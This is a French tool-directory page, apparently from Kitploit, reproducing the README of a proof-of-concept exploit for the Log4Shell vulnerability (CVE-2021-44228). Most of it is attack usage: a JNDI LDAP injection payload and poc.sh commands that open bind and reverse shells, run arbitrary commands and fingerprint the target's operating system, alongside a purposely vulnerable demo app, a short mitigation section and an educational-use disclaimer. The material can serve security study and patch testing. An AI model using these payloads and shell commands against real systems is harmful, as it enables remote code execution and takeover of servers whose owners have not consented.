Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44228-PoC | Kitploit
Outils/GitHubGitHub/thearqsz/cve-2021-44228-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubthearqsz/cve-2021-44228-poc

CVE-2021-44228-PoC

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-44228 PoC

PoC pour CVE-2021-44228.

Projet réalisé UNIQUEMENT À DES FINS ÉDUCATIVES.

Serveur d'exploit

Ce projet crée deux serveurs : http et ldap. Les deux sont nécessaires au fonctionnement de l'exploit. Le fichier java spécifié est compilé et les serveurs sont démarrés dans le Dockerfile. Le payload est affiché à l'utilisateur - il doit être transmis à l'application vulnérable.

Exemple de payload :

root@kitploit:~
${jndi:ldap//127.0.0.1:1389/a}

Comment exécuter ?

  • Bind shell
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e bind --remote-port 4445
  • Reverse shell
root@kitploit:~
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e reverse --listener-port 4444
  • RCE
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e rce --cmd 'ls | tee log.txt'
  • Détection de vulnérabilité basée sur le temps

Il met le programme en pause pendant 25 secondes

root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e vulndetect
  • Détection du système d'exploitation
root@kitploit:~
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e osdetect --listener-port 4444

La détection du système d'exploitation peut renvoyer 4 lettres :

  • L pour Linux
  • W pour Windows
  • M pour MacOS
  • U pour inconnu

Contournement

La technique de contournement a été publiée. Exemple ici

Application vulnérable

L'application a été conçue pour montrer comment cela fonctionne. Pour construire et exécuter le jar avec une application, utilisez :

root@kitploit:~
./build_vuln_app.sh
java -jar vulnapp/target/vulnapp.jar 'PAYLOAD'

où PAYLOAD est renvoyé par le script ./poc.sh (par ex. ${jndi:ldap://127.0.0.1:1389/1}).

Crédits

Quelques crédits pour les projets et sites web qui ont été utilisés lors de la création de cet exploit :

  • https://github.com/shanfenglan/apache_log4j_poc
  • https://github.com/ivan-sincek/java-reverse-tcp
  • https://www.lunasec.io/docs/blog/log4j-zero-day/
  • https://github.com/RandomRobbieBF/marshalsec-jar

Comment vous protéger ?

Lancez l'application utilisant log4j avec log4j2.formatMsgNoLookups défini sur true, ou mettez à jour vers log4j-2.15.0-rc1 ou une version ultérieure. Des mises à jour sont disponibles dans la nature - appliquez-les dès que possible.

Avis de non-responsabilité

Ce projet ne peut être utilisé qu'à des fins éducatives. L'utilisation de ce logiciel contre des systèmes cibles sans autorisation préalable est illégale, et l'auteur ne sera pas responsable des dommages causés par une mauvaise utilisation de ce logiciel.

Télécharger l’outil